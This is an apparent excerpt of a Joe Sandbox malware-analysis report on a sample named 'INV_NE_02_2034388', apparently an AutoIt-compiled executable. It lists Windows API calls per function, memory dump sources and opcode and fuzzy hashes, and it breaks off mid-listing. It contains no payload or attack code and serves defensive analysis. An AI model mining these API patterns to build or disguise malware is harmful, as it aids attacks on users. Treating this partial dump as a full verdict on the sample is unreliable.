                                          • Instruction ID: 7fddb71dde958e39fcb3a6c510ab3baa253fdc7758dd24915aa715b62d13aa7d
                                          • Opcode Fuzzy Hash: 160eb17e62320b7bbf337618fe6fc93a6594a99eabeefda2bce19ae1877e2877
                                          • Instruction Fuzzy Hash: 6331C47090C340CACB35FF68C888739BBE0EBA1760F4C95DAD1859A2F2D6758C04D756
                                          Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                          Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                          • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                          • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                          • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                          Function 00407B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 63a7b8eb75f2e55d05e39e69cc963c8fac173b89f0bfddb654610ad48010f242
                                          • Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
                                          • Opcode Fuzzy Hash: 63a7b8eb75f2e55d05e39e69cc963c8fac173b89f0bfddb654610ad48010f242
                                          • Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E
                                          Function 0040784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                          • Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
                                          • Opcode Fuzzy Hash: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                          • Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799
                                          Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                            • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                            • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                            • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                          • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                          • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                          • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                          Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                          • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                          • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                          • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                          Function 00407DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                          • Instruction ID: 8ac4692a4edd8b950221785d74b091900f33ceedfbe0b692f8040025a9c6a4da
                                          • Opcode Fuzzy Hash: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                          • Instruction Fuzzy Hash: E90126B26013016EC3209F29D806FA7BBD4AB04360F10853FF61ACA1D1EA79F84087D8
                                          Function 00B86086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 3f60ead258d986c48c07b4a99279e7b8d7b91b053404810a6fe7c69c1049da74
                                          • Instruction ID: d2ab6bf7235161544814455b574aefdc0fb6155a9d0d7640abbb417958b5a9c6
                                          • Opcode Fuzzy Hash: 3f60ead258d986c48c07b4a99279e7b8d7b91b053404810a6fe7c69c1049da74
                                          • Instruction Fuzzy Hash: 0401806180D340DECB35BB2484497367BF4EF56310F0996DAE285AB1B3D6308C04CB56
                                          Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          • __lock_file.LIBCMT ref: 004248A6
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                          • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                          • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                          • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                          Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                          • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                          • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                          • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                          Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                          • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                          • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                          • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                          Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                          Function 00E9DEE0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: b5da04e8374de124d6b1277a98e128d9332d634d628fe23c07ff774682dffb10
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 3FE0E67494410DDFDB00EFB4D94969E7FB4EF04301F100161FD01E2280D7309D508A62

                                          Non-executed Functions

                                          Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                          • SendMessageW.USER32 ref: 0048CC29
                                          • _wcsncpy.LIBCMT ref: 0048CC95
                                          • GetKeyState.USER32(00000011), ref: 0048CCB6
                                          • GetKeyState.USER32(00000009), ref: 0048CCC3
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                          • GetKeyState.USER32(00000010), ref: 0048CCE3
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                          • SendMessageW.USER32 ref: 0048CD33
                                          • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                          • SetCapture.USER32(?), ref: 0048CE69
                                          • ClientToScreen.USER32(?,?), ref: 0048CECE
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                          • ReleaseCapture.USER32 ref: 0048CF00
                                          • GetCursorPos.USER32(?), ref: 0048CF3A
                                          • ScreenToClient.USER32(?,?), ref: 0048CF47
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                          • SendMessageW.USER32 ref: 0048CFD1
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                          • SendMessageW.USER32 ref: 0048D03D
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                          • GetCursorPos.USER32(?), ref: 0048D08D
                                          • ScreenToClient.USER32(?,?), ref: 0048D09A
                                          • GetParent.USER32(?), ref: 0048D0BA
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                          • SendMessageW.USER32 ref: 0048D154
                                          • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                          • SendMessageW.USER32 ref: 0048D22F
                                          • ClientToScreen.USER32(?,?), ref: 0048D281
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                            • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F$pbL
                                          • API String ID: 3977979337-2097280626
                                          • Opcode ID: 4f16bd0a54bb31305c98b4c410e4e88b7a309b179b874218d8dc8bbaa358dfdb
                                          • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                          • Opcode Fuzzy Hash: 4f16bd0a54bb31305c98b4c410e4e88b7a309b179b874218d8dc8bbaa358dfdb
                                          • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                          Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                          • API String ID: 1357608183-1426331590
                                          • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                          • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                          • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                          • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                          Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                          • IsIconic.USER32(?), ref: 0043D66E
                                          • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                          • SetForegroundWindow.USER32(?), ref: 0043D685
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                          • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                          • SetForegroundWindow.USER32(?), ref: 0043D6D2
